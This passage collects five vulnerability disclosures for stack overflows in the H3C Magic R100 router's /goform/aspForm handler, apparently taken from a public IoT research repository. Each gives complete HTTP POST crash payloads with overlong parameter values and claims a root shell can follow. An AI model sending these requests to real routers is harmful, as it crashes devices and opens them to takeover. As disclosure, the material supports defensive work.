    EditMacList=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-30926: IOT_vuln/H3C/magicR100/18 at main · EPhaha/IOT_vuln

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the AddMacList parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through param parameter is passed to V10, and then the matched content is formatted into the stack of V11, V13, V14 and V12 through sscanf function. There is no size check, so there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    AddMacList=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-30925: IOT_vuln/H3C/magicR100/17 at main · EPhaha/IOT_vuln

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the SetAPWifiorLedInfoById parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the param parameter is passed to V5, and then the matched content is formatted into the V9 stack through the sscanf function. There is no size check, so there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    SetAPWifiorLedInfoById=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-30924: IOT_vuln/H3C/magicR100/15 at main · EPhaha/IOT_vuln

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the Asp_SetTimingtimeWifiAndLed parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through param parameter is passed to V6, and then the matched content is formatted into the stack of V16 through sscanf function. There is no size check, so there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    Asp_SetTimingtimeWifiAndLed=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-30923: IOT_vuln/H3C/magicR100/16 at main · EPhaha/IOT_vuln

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the EditWlanMacList parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through param parameter is passed to V3, and then the matched content is passed to V4, V5 and V13 through sscanf function. There is no size check in the stack, so there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    EditWlanMacList=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

CVE-2022-30922: IOT_vuln/H3C/magicR100/11 at main · EPhaha/IOT_vuln

H3C Magic R100 R100V100R005 was discovered to contain a stack overflow vulnerability via the SetMobileAPInfoById parameter at /goform/aspForm.

**H3C magic R100 R100V100R005.bin Stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_201801/1060028\_30005\_0.htm

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the param parameter is passed to V6, and then the matched content is formatted into the V10 stack through the sscanf function. There is no size check, and there is a stack overflow vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware R100V100R005.bin
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Origin: http://192.168.0.1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache
    
    SetMobileAPInfoById=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
    

Figure 2 POC attack effect

Finally, you can write exp, which can obtain a stable root shell without authorization

Tag

#intel